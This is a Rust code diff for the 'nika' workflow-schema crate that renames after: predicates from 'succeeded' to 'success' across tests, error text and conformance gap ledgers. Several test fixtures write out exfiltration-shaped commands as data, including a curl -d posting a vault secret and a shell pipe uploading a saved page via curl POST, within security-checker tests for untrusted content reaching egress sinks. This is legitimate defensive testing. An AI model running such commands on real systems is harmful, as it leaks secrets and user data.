-        let yaml = "nika: v1\nworkflow:\n  id: w\nmodel: anthropic/claude-sonnet-4-6\npermits: { exec: false, tools: [\"nika:read\"] }\nsecrets:\n  k: { source: vault, key: x }\ntasks:\n  a:\n    invoke: { tool: \"nika:raed\", args: { path: \"./in\" } }\n  b:\n    after: { a: succeeded }\n    exec: { command: [\"curl\", \"-d\", \"${{ secrets.k }}\", \"x\"] }\n  c:\n    with: { b_out: \"${{ tasks.b.output }}\" }\n    infer: { prompt: \"go ${{ with.b_out }}\", max_tokens: 50 }\n";
+        let yaml = "nika: v1\nworkflow:\n  id: w\nmodel: anthropic/claude-sonnet-4-6\npermits: { exec: false, tools: [\"nika:read\"] }\nsecrets:\n  k: { source: vault, key: x }\ntasks:\n  a:\n    invoke: { tool: \"nika:raed\", args: { path: \"./in\" } }\n  b:\n    after: { a: success }\n    exec: { command: [\"curl\", \"-d\", \"${{ secrets.k }}\", \"x\"] }\n  c:\n    with: { b_out: \"${{ tasks.b.output }}\" }\n    infer: { prompt: \"go ${{ with.b_out }}\", max_tokens: 50 }\n";
         let wf = parse(yaml, FileId::new(0), ParseMode::Strict).expect("parse");
         let first = serde_json::to_string(&check(&wf)).expect("serialize");
         let second = serde_json::to_string(&check(&wf)).expect("serialize");

--- a/crates/nika-schema/src/check/native_first.rs
+++ b/crates/nika-schema/src/check/native_first.rs
@@ -414,14 +414,14 @@ tasks:
   crawl_site:
     exec: { command: ["curl", "-s", "https://acme.test", "-o", "out/site.html"] }
   upload_background:
-    after: { crawl_site: succeeded }
+    after: { crawl_site: success }
     exec:
       command: ["node", "workflows/site/bin/helper.mjs", "upload", "--file", "out/bg.png"]
   render_background:
-    after: { crawl_site: succeeded }
+    after: { crawl_site: success }
     exec: { command: ["curl", "-X", "POST", "https://api.openai.com/v1/images/generations"] }
   write_manifest:
-    after: { upload_background: succeeded, render_background: succeeded }
+    after: { upload_background: success, render_background: success }
     exec: { shell: "jq -n '{done: true}' > out/manifest.json" }
 "#;
         let hints = hints_of(yaml);

--- a/crates/nika-schema/src/check/policy.rs
+++ b/crates/nika-schema/src/check/policy.rs
@@ -128,7 +128,7 @@ mod tests {
     #[test]
     fn exec_after_reads_control_edges_too() {
         let r = report(
-            "nika: v1\nworkflow:\n  id: t\npolicy:\n  forbid:\n    exec_after: [net]\npermits:\n  exec: [\"echo\"]\n  net: { http: [\"example.com\"] }\n  tools: [\"nika:fetch\"]\ntasks:\n  fetch_page:\n    invoke:\n      tool: \"nika:fetch\"\n      args: { url: \"https://example.com/data\" }\n  act:\n    after: { fetch_page: succeeded }\n    exec: { command: [\"echo\", \"x\"] }\n",
+            "nika: v1\nworkflow:\n  id: t\npolicy:\n  forbid:\n    exec_after: [net]\npermits:\n  exec: [\"echo\"]\n  net: { http: [\"example.com\"] }\n  tools: [\"nika:fetch\"]\ntasks:\n  fetch_page:\n    invoke:\n      tool: \"nika:fetch\"\n      args: { url: \"https://example.com/data\" }\n  act:\n    after: { fetch_page: success }\n    exec: { command: [\"echo\", \"x\"] }\n",
         );
         assert_eq!(r.policy_findings.len(), 1, "{:?}", r.policy_findings);
     }
@@ -241,7 +241,7 @@ mod tests {
     #[test]
     fn broken_dag_skips_the_policy_lane() {
         let r = report(
-            "nika: v1\nworkflow:\n  id: t\npolicy:\n  require:\n    human_gate_before: [exec]\ntasks:\n  act:\n    after: { ghost: succeeded }\n    exec: { command: [\"echo\", \"x\"] }\n",
+            "nika: v1\nworkflow:\n  id: t\npolicy:\n  require:\n    human_gate_before: [exec]\ntasks:\n  act:\n    after: { ghost: success }\n    exec: { command: [\"echo\", \"x\"] }\n",
         );
         assert!(!r.conformance.is_empty());
         assert!(

--- a/crates/nika-schema/src/check/reach.rs
+++ b/crates/nika-schema/src/check/reach.rs
@@ -872,7 +872,7 @@ mod tests {
     #[test]
     fn when_false_literal_is_the_documented_never_pattern_not_a_finding() {
         let f = gates(&wf(
-            "  a:\n    exec: { command: [\"true\"] }\n  b:\n    after: { a: succeeded }\n    when: false\n    exec: { command: [\"true\"] }\n",
+            "  a:\n    exec: { command: [\"true\"] }\n  b:\n    after: { a: success }\n    when: false\n    exec: { command: [\"true\"] }\n",
         ));
         assert!(f.is_empty(), "{f:?}");
     }
@@ -956,7 +956,7 @@ mod tests {
         // c gated on b == 'skipped' is ALIVE: the never-pattern makes
         // skipped a real status downstream
         let f = gates(&wf(
-            "  a:\n    exec: { command: [\"true\"] }\n  b:\n    after: { a: succeeded }\n    when: false\n    exec: { command: [\"true\"] }\n  c:\n    with: { b_status: \"${{ tasks.b.status }}\" }\n    when: ${{ with.b_status == 'skipped' }}\n    exec: { command: [\"true\"] }\n",
+            "  a:\n    exec: { command: [\"true\"] }\n  b:\n    after: { a: success }\n    when: false\n    exec: { command: [\"true\"] }\n  c:\n    with: { b_status: \"${{ tasks.b.status }}\" }\n    when: ${{ with.b_status == 'skipped' }}\n    exec: { command: [\"true\"] }\n",
         ));
         assert!(f.is_empty(), "{f:?}");
     }
@@ -1084,7 +1084,7 @@ mod tests {
         // the |= S_SUCCESS paths must really add SUCCESS (a &= mutant
         // kills the chain and the downstream gates go dead)
         let f = gates(&wf(
-            "  a:\n    exec: { command: [\"true\"] }\n  b:\n    after: { a: succeeded }\n    when: true\n    exec: { command: [\"true\"] }\n  c:\n    with: { b_status: \"${{ tasks.b.status }}\" }\n    when: ${{ with.b_status == 'success' }}\n    exec: { command: [\"true\"] }\n  d:\n    with: { c_status: \"${{ tasks.c.status }}\" }\n    when: ${{ with.c_status == 'success' }}\n    exec: { command: [\"true\"] }\n",
+            "  a:\n    exec: { command: [\"true\"] }\n  b:\n    after: { a: success }\n    when: true\n    exec: { command: [\"true\"] }\n  c:\n    with: { b_status: \"${{ tasks.b.status }}\" }\n    when: ${{ with.b_status == 'success' }}\n    exec: { command: [\"true\"] }\n  d:\n    with: { c_status: \"${{ tasks.c.status }}\" }\n    when: ${{ with.c_status == 'success' }}\n    exec: { command: [\"true\"] }\n",
         ));
         assert!(f.is_empty(), "{f:?}");
     }
@@ -1135,7 +1135,7 @@ mod tests {
         // Asserting `c` is alive pins the default-gate path through a
         // downstream status observation.
         let f = gates(&wf("  a:\n    exec: { command: [\"true\"] }\n  b:\n    \
-             after: { a: succeeded }\n    exec: { command: [\"true\"] }\n  c:\n    \
+             after: { a: success }\n    exec: { command: [\"true\"] }\n  c:\n    \
              with: { b_status: \"${{ tasks.b.status }}\" }\n    when: ${{ with.b_status == 'success' }}\n    \
              exec: { command: [\"true\"] }\n"));
         assert!(f.is_empty(), "{f:?}");

--- a/crates/nika-schema/src/check/requirements.rs
+++ b/crates/nika-schema/src/check/requirements.rs
@@ -237,11 +237,11 @@ tasks:
       tool: "nika:fetch"
       args: { url: "https://api.example.com/${{ config.GITHUB_ORG }}" }
   digest:
-    after: { fetch: succeeded }
+    after: { fetch: success }
     infer:
       prompt: "Summarize for ${{ config.REGION }}"
   local_pass:
-    after: { fetch: succeeded }
+    after: { fetch: success }
     for_each: "${{ config.SHARDS }}"
     on_finally:
       - exec: { command: ["echo", "${{ config.CLEANUP_FLAG }}"] }

--- a/crates/nika-schema/src/check/trifecta.rs
+++ b/crates/nika-schema/src/check/trifecta.rs
@@ -129,7 +129,7 @@ mod tests {
 
     /// The six NEP-0002 conformance cases (the spec-side fixtures under
     /// `conformance/security/` mirror these one-for-one).
-    const TRIFECTA: &str = "nika: v1\nworkflow:\n  id: t\npermits:\n  fs: { read: [\"./inbox/**\"], write: [\"./out/**\"] }\n  net: { http: [\"api.example.com\"] }\n  tools: [\"nika:fetch\", \"nika:write\", \"nika:prompt\"]\ntasks:\n  fetch_page:\n    invoke:\n      tool: \"nika:fetch\"\n      args: { url: \"https://api.example.com/data\" }\n  leak:\n    after: { fetch_page: succeeded }\n    with: { body: \"${{ tasks.fetch_page.output }}\" }\n    invoke:\n      tool: \"nika:write\"\n      args: { path: \"./out/leak.txt\", content: \"${{ with.body }}\" }\n";
+    const TRIFECTA: &str = "nika: v1\nworkflow:\n  id: t\npermits:\n  fs: { read: [\"./inbox/**\"], write: [\"./out/**\"] }\n  net: { http: [\"api.example.com\"] }\n  tools: [\"nika:fetch\", \"nika:write\", \"nika:prompt\"]\ntasks:\n  fetch_page:\n    invoke:\n      tool: \"nika:fetch\"\n      args: { url: \"https://api.example.com/data\" }\n  leak:\n    after: { fetch_page: success }\n    with: { body: \"${{ tasks.fetch_page.output }}\" }\n    invoke:\n      tool: \"nika:write\"\n      args: { path: \"./out/leak.txt\", content: \"${{ with.body }}\" }\n";
 
     /// ①∧②∧③ declared, no gate → the diagnostic, once per ungated egress
     /// task THE CONTENT REACHES (v2.0: `leak` is the realized sink;
@@ -188,7 +188,7 @@ mod tests {
     fn trifecta_gated_pass() {
         let gated = TRIFECTA.replacen(
             "tasks:\n  fetch_page:",
-            "tasks:\n  ask:\n    invoke:\n      tool: \"nika:prompt\"\n      args: { mode: \"choice\", message: \"exfiltrate?\", choices: [\"no\", \"yes\"] }\n  fetch_page:\n    after: { ask: succeeded }",
+            "tasks:\n  ask:\n    invoke:\n      tool: \"nika:prompt\"\n      args: { mode: \"choice\", message: \"exfiltrate?\", choices: [\"no\", \"yes\"] }\n  fetch_page:\n    after: { ask: success }",
             1,
         );
         let r = report(&gated);
@@ -221,7 +221,7 @@ mod tests {
         );
         // No ③ (no net · workspace-confined writes · no exec) — fetch
         // still pulls untrusted content, but nothing can leave.
-        let no_egress = "nika: v1\nworkflow:\n  id: t\npermits:\n  fs: { read: [\"./inbox/**\"], write: [\"./out/**\"] }\n  tools: [\"nika:fetch\", \"nika:write\"]\ntasks:\n  fetch_page:\n    invoke:\n      tool: \"nika:fetch\"\n      args: { url: \"https://api.example.com/data\" }\n  save:\n    after: { fetch_page: succeeded }\n    with: { body: \"${{ tasks.fetch_page.output }}\" }\n    invoke:\n      tool: \"nika:write\"\n      args: { path: \"./out/save.txt\", content: \"${{ with.body }}\" }\n";
+        let no_egress = "nika: v1\nworkflow:\n  id: t\npermits:\n  fs: { read: [\"./inbox/**\"], write: [\"./out/**\"] }\n  tools: [\"nika:fetch\", \"nika:write\"]\ntasks:\n  fetch_page:\n    invoke:\n      tool: \"nika:fetch\"\n      args: { url: \"https://api.example.com/data\" }\n  save:\n    after: { fetch_page: success }\n    with: { body: \"${{ tasks.fetch_page.output }}\" }\n    invoke:\n      tool: \"nika:write\"\n      args: { path: \"./out/save.txt\", content: \"${{ with.body }}\" }\n";
         assert!(
             report(no_egress).trifecta_findings.is_empty(),
             "③ dropped → clean"
@@ -254,7 +254,7 @@ mod tests {
     fn a_defaulted_prompt_is_not_blocking() {
         let defaulted = TRIFECTA.replacen(
             "tasks:\n  fetch_page:",
-            "tasks:\n  ask:\n    invoke:\n      tool: \"nika:prompt\"\n      args: { message: \"ok?\", default: true }\n  fetch_page:\n    after: { ask: succeeded }",
+            "tasks:\n  ask:\n    invoke:\n      tool: \"nika:prompt\"\n      args: { message: \"ok?\", default: true }\n  fetch_page:\n    after: { ask: success }",
             1,
         );
         let r = report(&defaulted);
@@ -274,7 +274,7 @@ mod tests {
     #[test]
     fn no_declared_boundary_no_claim() {
         let r = report(
-            "nika: v1\nworkflow:\n  id: t\ntasks:\n  fetch_page:\n    invoke:\n      tool: \"nika:fetch\"\n      args: { url: \"https://api.example.com/data\" }\n  leak:\n    after: { fetch_page: succeeded }\n    exec: { command: [\"echo\", \"x\"] }\n",
+            "nika: v1\nworkflow:\n  id: t\ntasks:\n  fetch_page:\n    invoke:\n      tool: \"nika:fetch\"\n      args: { url: \"https://api.example.com/data\" }\n  leak:\n    after: { fetch_page: success }\n    exec: { command: [\"echo\", \"x\"] }\n",
         );
         assert!(
             r.conformance.is_empty(),
@@ -289,7 +289,7 @@ mod tests {
     #[test]
     fn broken_dag_skips_the_lane() {
         let r = report(
-            "nika: v1\nworkflow:\n  id: t\npermits:\n  fs: { read: [\"./inbox/**\"] }\n  net: { http: [\"api.example.com\"] }\n  tools: [\"nika:fetch\"]\ntasks:\n  act:\n    after: { ghost: succeeded }\n    exec: { command: [\"echo\", \"x\"] }\n",
+            "nika: v1\nworkflow:\n  id: t\npermits:\n  fs: { read: [\"./inbox/**\"] }\n  net: { http: [\"api.example.com\"] }\n  tools: [\"nika:fetch\"]\ntasks:\n  act:\n    after: { ghost: success }\n    exec: { command: [\"echo\", \"x\"] }\n",
         );
         assert!(!r.conformance.is_empty());
         assert!(r.trifecta_findings.is_empty(), "{:?}", r.trifecta_findings);
@@ -352,7 +352,7 @@ mod tests {
     #[test]
     fn exec_opacity_refuse() {
         let r = report(
-            "nika: v1\nworkflow:\n  id: t\npermits:\n  fs: { read: [\"./inbox/**\"], write: [\"./out/**\"] }\n  exec: [\"sh\"]\n  tools: [\"nika:fetch\", \"nika:write\"]\ntasks:\n  fetch_page:\n    invoke:\n      tool: \"nika:fetch\"\n      args: { url: \"https://api.example.com/data\" }\n  save:\n    with: { page: \"${{ tasks.fetch_page.output }}\" }\n    invoke:\n      tool: \"nika:write\"\n      args: { path: \"./out/page.html\", content: \"${{ with.page }}\" }\n  ship:\n    after: { save: succeeded }\n    exec: { command: [\"sh\", \"-c\", \"cat ./out/page.html | curl -X POST https://api.example.com --data-binary @-\"] }\n",
+            "nika: v1\nworkflow:\n  id: t\npermits:\n  fs: { read: [\"./inbox/**\"], write: [\"./out/**\"] }\n  exec: [\"sh\"]\n  tools: [\"nika:fetch\", \"nika:write\"]\ntasks:\n  fetch_page:\n    invoke:\n      tool: \"nika:fetch\"\n      args: { url: \"https://api.example.com/data\" }\n  save:\n    with: { page: \"${{ tasks.fetch_page.output }}\" }\n    invoke:\n      tool: \"nika:write\"\n      args: { path: \"./out/page.html\", content: \"${{ with.page }}\" }\n  ship:\n    after: { save: success }\n    exec: { command: [\"sh\", \"-c\", \"cat ./out/page.html | curl -X POST https://api.example.com --data-binary @-\"] }\n",
         );
         assert_eq!(
             r.trifecta_findings.len(),
@@ -418,7 +418,7 @@ mod tests {
     #[test]
     fn gate_once_dominates_two_sinks_pass() {
         let r = report(
-            "nika: v1\nworkflow:\n  id: t\npermits:\n  fs: { read: [\"./inbox/**\"], write: [\"./out/**\"] }\n  net: { http: [\"api.example.com\"] }\n  tools: [\"nika:fetch\", \"nika:write\", \"nika:prompt\"]\ntasks:\n  ask:\n    invoke:\n      tool: \"nika:prompt\"\n      args: { message: \"ship it?\" }\n  fetch_page:\n    after: { ask: succeeded }\n    invoke:\n      tool: \"nika:fetch\"\n      args: { url: \"https://api.example.com/data\" }\n  leak:\n    with: { body: \"${{ tasks.fetch_page.output }}\" }\n    invoke:\n      tool: \"nika:write\"\n      args: { path: \"./out/leak.txt\", content: \"${{ with.body }}\" }\n  leak2:\n    with: { body: \"${{ tasks.fetch_page.output }}\" }\n    invoke:\n      tool: \"nika:write\"\n      args: { path: \"./out/leak2.txt\", content: \"${{ with.body }}\" }\n",
+            "nika: v1\nworkflow:\n  id: t\npermits:\n  fs: { read: [\"./inbox/**\"], write: [\"./out/**\"] }\n  net: { http: [\"api.example.com\"] }\n  tools: [\"nika:fetch\", \"nika:write\", \"nika:prompt\"]\ntasks:\n  ask:\n    invoke:\n      tool: \"nika:prompt\"\n      args: { message: \"ship it?\" }\n  fetch_page:\n    after: { ask: success }\n    invoke:\n      tool: \"nika:fetch\"\n      args: { url: \"https://api.example.com/data\" }\n  leak:\n    with: { body: \"${{ tasks.fetch_page.output }}\" }\n    invoke:\n      tool: \"nika:write\"\n      args: { path: \"./out/leak.txt\", content: \"${{ with.body }}\" }\n  leak2:\n    with: { body: \"${{ tasks.fetch_page.output }}\" }\n    invoke:\n      tool: \"nika:write\"\n      args: { path: \"./out/leak2.txt\", content: \"${{ with.body }}\" }\n",
         );
         assert!(
             r.trifecta_findings.is_empty(),

--- a/crates/nika-schema/src/error.rs
+++ b/crates/nika-schema/src/error.rs
@@ -157,7 +157,7 @@ pub enum SchemaError {
     /// control through `after:` predicates (spec `03-dag.md`
     /// §`depends_on` · `check --fix` migrates the provable cases).
     #[error(
-        "task `{task}` carries `depends_on:` — dead since W2; data → `with:` bindings (the binding IS the edge) · control → `after: {{{task_hint}: succeeded}}` (`nika check --fix` migrates the provable cases)"
+        "task `{task}` carries `depends_on:` — dead since W2; data → `with:` bindings (the binding IS the edge) · control → `after: {{{task_hint}: success}}` (`nika check --fix` migrates the provable cases)"
     )]
     W2DependsOnField {
         /// The task (named by its map key).
@@ -168,12 +168,11 @@ pub enum SchemaError {
         span: Option<Span>,
     },
 
-    /// W2 · an `after:` predicate outside the closed set (spec
-    /// `03-dag.md` §after · `NIKA-DAG-005`).
-    #[error(
-        "task `{task}` after.{target}: `{predicate}` is not a predicate — the set is closed: succeeded · failed · skipped · terminal"
-    )]
+    /// W2 · an out-of-set `after:` predicate (03 §after · `NIKA-DAG-005` · R5 dead spellings teach).
+    #[error("{message}")]
     UnknownAfterPredicate {
+        /// The refusal text (dead-spelling teaching or the closed set).
+        message: String,
         /// The declaring task.
         task: String,
         /// The producer entry carrying the bad predicate.
@@ -1015,6 +1014,7 @@ fn analysis_level_variants() -> Vec<SchemaError> {
             span: None,
         },
         SchemaError::UnknownAfterPredicate {
+            message: String::new(),
             task: String::new(),
             target: String::new(),
             predicate: String::new(),

--- a/crates/nika-schema/src/parser/tasks.rs
+++ b/crates/nika-schema/src/parser/tasks.rs
@@ -11,6 +11,7 @@
 use std::time::Duration;
 
 use marked_yaml::types::MarkedMappingNode;
+use nika_vocab::after::predicate_refusal;
 
 use crate::error::SchemaError;
 use crate::raw::{ForEachValue, RawFinallyTask, RawTask};
@@ -201,12 +202,10 @@ fn parse_returns(
     )))
 }
 
-/// One parsed `after:` map — `(producer, predicate)` entries in source order.
 type AfterEntries = Vec<(Spanned<String>, Spanned<AfterPredicate>)>;
 
-/// `after:` — the CONTROL boundary · a map `{producer: predicate}`
-/// over the CLOSED predicate set (spec 03 §after · `NIKA-DAG-005`
-/// outside it · target resolution is the analyzer's DAG-002).
+/// `after:` — the CONTROL boundary · a map `{producer: predicate}` over the
+/// CLOSED outcome-class set (03 §after · R5 · `NIKA-DAG-005` · targets: DAG-002).
 fn parse_after(
     cx: &Cx<'_>,
     mapping: &MarkedMappingNode,
@@ -229,6 +228,7 @@ fn parse_after(
         let target = Spanned::new(key.as_str().to_owned(), cx.span_or_zero(key.span()));
         let Some(scalar) = value.as_scalar() else {
             return Err(SchemaError::UnknownAfterPredicate {
+                message: predicate_refusal(task, &target.value, "(not a string)"),
                 task: task.to_owned(),
                 target: target.value,
                 predicate: "(not a string)".to_owned(),
@@ -238,6 +238,7 @@ fn parse_after(
         let raw = scalar.as_str();
         let Some(predicate) = AfterPredicate::parse(raw) else {
             return Err(SchemaError::UnknownAfterPredicate {
+                message: predicate_refusal(task, &target.value, raw),
                 task: task.to_owned(),
                 target: target.value,
                 predicate: raw.to_owned(),
@@ -943,7 +944,7 @@ tasks:
   a:
     exec: { shell: echo a }
   b:
-    after: { a: succeeded }
+    after: { a: success }
     when: ${{ vars.flag == true }}
     for_each: ${{ vars.items }}
     exec: { shell: echo b }
@@ -952,7 +953,7 @@ tasks:
         let b = &wf.tasks[1].value;
         assert_eq!(b.after.len(), 1);
         assert_eq!(b.after[0].0.value, "a");
-        assert_eq!(b.after[0].1.value, AfterPredicate::Succeeded);
+        assert_eq!(b.after[0].1.value, AfterPredicate::Success);
         assert_eq!(
             b.when.as_ref().expect("when").value,
             WhenGate::Expr("${{ vars.flag == true }}".into())
@@ -961,6 +962,52 @@ tasks:
             b.for_each.as_ref().expect("for_each").value,
             crate::raw::ForEachValue::Expression("${{ vars.items }}".into())
         );
+    }
+
+    #[test]
+    fn r5_dead_predicate_spellings_refuse_teaching_in_both_modes() {
+        // The R5 flag-day (spec #118 · LAW-GRAMMAR-0231): `succeeded` /
+        // `failed` are DEAD spellings — the refusal TEACHES the respelling
+        // and the `nika check --fix` repair (mode-independent, the C2
+        // dead-form doctrine), and it rides NIKA-DAG-005 (the spec
+        // registers no separate code for out-of-set spellings).
+        for dead in ["succeeded", "failed"] {
+            let yaml = format!(
+                "tasks:\n  tests:\n    exec: {{ shell: echo t }}\n  deploy:\n    after: {{ tests: {dead} }}\n    exec: {{ shell: echo d }}\n"
+            );
+            for mode in [ParseMode::Strict, ParseMode::Lenient] {
+                let err = parse(&yaml, FileId::new(0), mode).expect_err("dead spelling");
+                let SchemaError::UnknownAfterPredicate {
+                    message, predicate, ..
+                } = &err
+                else {
+                    panic!("expected UnknownAfterPredicate, got {err:?}");
+                };
+                let to = nika_vocab::after::dead_spelling_respelling(dead).expect("dead");
+                assert_eq!(predicate, dead);
+                assert!(message.contains("dead predicate spelling"), "{message}");
+                assert!(message.contains(&format!("respell as `{to}`")), "{message}");
+                assert!(message.contains("nika check --fix"), "{message}");
+                assert_eq!(err.spec_code().to_string(), "NIKA-DAG-005");
+            }
+        }
+    }
+
+    #[test]
+    fn unknown_after_predicate_names_the_closed_outcome_class_set() {
+        // A genuinely-unknown predicate gets the closed-set text (never
+        // the dead-spelling teaching) — conformance dag-topology/016.
+        let yaml = "tasks:\n  t:\n    exec: { shell: echo t }\n  d:\n    after: { t: passed }\n    exec: { shell: echo d }\n";
+        let err = parse_strict(yaml).expect_err("unknown predicate");
+        let SchemaError::UnknownAfterPredicate { message, .. } = &err else {
+            panic!("expected UnknownAfterPredicate, got {err:?}");
+        };
+        assert!(message.contains("is not a predicate"), "{message}");
+        assert!(
+            message.contains("success · failure · skipped · terminal"),
+            "{message}"
+        );
+        assert_eq!(err.spec_code().to_string(), "NIKA-DAG-005");
     }
 
     #[test]

--- a/crates/nika-schema/tests/conformance_core.rs
+++ b/crates/nika-schema/tests/conformance_core.rs
@@ -33,13 +33,10 @@ use common::{fixture_dirs, fixture_verdict, skip_in_mutants_sandbox, spec_dir};
 /// The core-tier gap ledger · fixture-name prefix → why the engine does
 /// not hold the verdict yet. Closing a gap = implement + DELETE the row.
 const CORE_GAPS: &[(&str, &str)] = &[
-    // ── The R5 predicates wave (spec #118 · pc-light · `after:` speaks
-    // the outcome-class spellings success·failure·skipped·terminal — the
-    // engine's closed set is still succeeded·failed·skipped·terminal, so
-    // every after:-carrying fixture refuses NIKA-DAG-005 before reaching
-    // its expected verdict). The wave is its own epic (display · dap ·
-    // lints · lsp · runtime all speak the participial spellings); each
-    // row deletes itself when the rename lands.
+    // ── The R5 predicates wave CLOSED (spec #118 · the engine speaks
+    // the outcome-class spellings success·failure·skipped·terminal —
+    // the 8 after:-carrying rows deleted the day the rename landed, per
+    // the ratchet « a landed wave forces removing its row »).
     // ── R3b · a STALE FIXTURE at the pin (spec-side, not an engine
     // gap): envelope/010 declares `type: text` and still expects the
     // NIKA-PARSE namespace, but NIKA-PARSE-015 is retired-never-reuse
@@ -51,35 +48,6 @@ const CORE_GAPS: &[(&str, &str)] = &[
     (
         "envelope/010-typed-var-bad-type",
         "spec fixture stale for R3b (expects NIKA-PARSE · law: NIKA-TYPE-001)",
-    ),
-    ("dag-topology/001-cycle", "R5 predicates (success·failure)"),
-    (
-        "dag-topology/002-unresolved-after-target",
-        "R5 predicates (success·failure)",
-    ),
-    (
-        "dag-topology/003-when-task-ref-illegal",
-        "R5 predicates (success·failure)",
-    ),
-    (
-        "dag-topology/004-self-dependency",
-        "R5 predicates (success·failure)",
-    ),
-    (
-        "dag-topology/008-valid-diamond",
-        "R5 predicates (success·failure)",
-    ),
-    (
-        "dag-topology/009-valid-tightened-value-edge",
-        "R5 predicates (success·failure)",
-    ),
-    (
-        "dag-topology/012-recover-downstream-deadlock",
-        "R5 predicates (success·failure)",
-    ),
-    (
-        "dag-topology/015-cycle-mixed-with-after",
-        "R5 predicates (success·failure)",
     ),
 ];
 

--- a/crates/nika-schema/tests/conformance_deep.rs
+++ b/crates/nika-schema/tests/conformance_deep.rs
@@ -40,39 +40,10 @@ const DEEP_GAPS: &[(&str, &str)] = &[
     // harness now verdicts against the full `check()` surface (its
     // `capability_escapes`), so the fixture passes. Row deleted per the
     // ratchet (« the suite fails on a stale row by design »).
-
-    // ── The R5 predicates wave (spec #118 · pc-light · `after:` speaks
-    // the outcome-class spellings success·failure·skipped·terminal — the
-    // engine's closed set is still succeeded·failed·skipped·terminal, so
-    // every after:-carrying fixture refuses NIKA-DAG-005 before reaching
-    // its expected verdict). The wave is its own epic (display · dap ·
-    // lints · lsp · runtime all speak the participial spellings); each
-    // row deletes itself when the rename lands.
-    (
-        "001-cel-chained-relation",
-        "R5 predicates (success·failure)",
-    ),
-    ("007-bare-when-string", "R5 predicates (success·failure)"),
-    (
-        "023-dead-after-skipped-on-success-producer",
-        "R5 predicates (success·failure)",
-    ),
-    (
-        "024-dead-after-skipped-on-failure-producer",
-        "R5 predicates (success·failure)",
-    ),
-    (
-        "025-dead-after-skipped-on-cancelled-producer",
-        "R5 predicates (success·failure)",
-    ),
-    (
-        "026-dead-after-success-on-skipped-producer",
-        "R5 predicates (success·failure)",
-    ),
-    (
-        "027-dead-after-failure-on-skipped-producer",
-        "R5 predicates (success·failure)",
-    ),
+    // The R5 predicates wave CLOSED (spec #118 · the engine speaks the
+    // outcome-class spellings success·failure·skipped·terminal) — the 7
+    // rows (001 · 007 · 023-027) deleted the day the rename landed, per
+    // the ratchet. The ledger stands empty until the next wave.
 ];
 
 #[test]

--- a/crates/nika-schema/tests/metamorphic.rs
+++ b/crates/nika-schema/tests/metamorphic.rs
@@ -105,7 +105,7 @@ fn to_yaml(tasks: &[TaskSpec], prefix: &str) -> String {
         if !control.is_empty() {
             let _ = writeln!(y, "    after:");
             for d in control {
-                let _ = writeln!(y, "      {prefix}{d}: succeeded");
+                let _ = writeln!(y, "      {prefix}{d}: success");
             }
         }
         if t.attempts > 1 {

--- a/crates/nika-schema/tests/research_conformance.rs
+++ b/crates/nika-schema/tests/research_conformance.rs
@@ -36,7 +36,7 @@ fn aara_substitution_lemma_holds() {
     for n in [1usize, 2, 5, 9] {
         let items: Vec<String> = (0..n).map(|i| format!("\"f{i}\"")).collect();
         let concrete = run(&wf(&format!(
-            "  src:\n    exec: {{ command: [\"ls\"] }}\n  fan:\n    after: {{ src: succeeded }}\n    for_each: [{}]\n    retry: {{ max_attempts: 2 }}\n    infer: {{ prompt: \"x ${{{{ item }}}}\", max_tokens: 200 }}\n",
+            "  src:\n    exec: {{ command: [\"ls\"] }}\n  fan:\n    after: {{ src: success }}\n    for_each: [{}]\n    retry: {{ max_attempts: 2 }}\n    infer: {{ prompt: \"x ${{{{ item }}}}\", max_tokens: 200 }}\n",
             items.join(", ")
         )));
         let n64 = n as u64;
@@ -67,14 +67,14 @@ fn aara_substitution_lemma_holds() {
 fn brent_envelope_span_versus_work() {
     // chain: span == work
     let chain = run(&wf(
-        "  a:\n    exec: { command: [\"true\"] }\n  b:\n    after: { a: succeeded }\n    retry: { max_attempts: 4 }\n    exec: { command: [\"true\"] }\n",
+        "  a:\n    exec: { command: [\"true\"] }\n  b:\n    after: { a: success }\n    retry: { max_attempts: 4 }\n    exec: { command: [\"true\"] }\n",
     ));
     assert_eq!(chain.certificate.span_attempts, 5);
     assert_eq!(chain.certificate.task_attempts.constant, 5);
 
     // wide DAG: span < work (the parallelism IS the gap)
     let wide = run(&wf(
-        "  a:\n    exec: { command: [\"true\"] }\n  b:\n    after: { a: succeeded }\n    exec: { command: [\"true\"] }\n  c:\n    after: { a: succeeded }\n    exec: { command: [\"true\"] }\n  d:\n    after: { a: succeeded }\n    exec: { command: [\"true\"] }\n",
+        "  a:\n    exec: { command: [\"true\"] }\n  b:\n    after: { a: success }\n    exec: { command: [\"true\"] }\n  c:\n    after: { a: success }\n    exec: { command: [\"true\"] }\n  d:\n    after: { a: success }\n    exec: { command: [\"true\"] }\n",
     ));
     assert_eq!(wide.certificate.span_attempts, 2);
     assert_eq!(wide.certificate.task_attempts.constant, 4);
@@ -83,7 +83,7 @@ fn brent_envelope_span_versus_work() {
     for tasks in [
         "  a:\n    exec: { command: [\"true\"] }\n",
         "  a:\n    exec: { command: [\"true\"] }\n  b:\n    with: { xs: \"${{ tasks.a.output.xs }}\" }\n    for_each: ${{ with.xs }}\n    infer: { prompt: \"x ${{ item }}\", max_tokens: 10 }\n",
-        "  a:\n    retry: { max_attempts: 3 }\n    exec: { command: [\"true\"] }\n  b:\n    after: { a: succeeded }\n    exec: { command: [\"true\"] }\n  c:\n    after: { b: succeeded }\n    retry: { max_attempts: 2 }\n    exec: { command: [\"true\"] }\n",
+        "  a:\n    retry: { max_attempts: 3 }\n    exec: { command: [\"true\"] }\n  b:\n    after: { a: success }\n    exec: { command: [\"true\"] }\n  c:\n    after: { b: success }\n    retry: { max_attempts: 2 }\n    exec: { command: [\"true\"] }\n",
     ] {
         let r = run(&wf(tasks));
         assert!(
@@ -142,7 +142,7 @@ fn reach_dead_claims_agree_with_a_brute_force_oracle() {
 #[test]
 fn certifying_audit_rejects_every_systematic_tamper() {
     let yaml = wf(
-        "  a:\n    retry: { max_attempts: 2 }\n    exec: { command: [\"true\"] }\n  fan:\n    with: { xs: \"${{ tasks.a.output.xs }}\" }\n    for_each: ${{ with.xs }}\n    infer: { prompt: \"x ${{ item }}\", max_tokens: 100 }\n  save:\n    after: { fan: succeeded }\n    invoke: { tool: \"nika:write\", args: { path: \"./o\", content: \"y\" } }\n",
+        "  a:\n    retry: { max_attempts: 2 }\n    exec: { command: [\"true\"] }\n  fan:\n    with: { xs: \"${{ tasks.a.output.xs }}\" }\n    for_each: ${{ with.xs }}\n    infer: { prompt: \"x ${{ item }}\", max_tokens: 100 }\n  save:\n    after: { fan: success }\n    invoke: { tool: \"nika:write\", args: { path: \"./o\", content: \"y\" } }\n",
     );
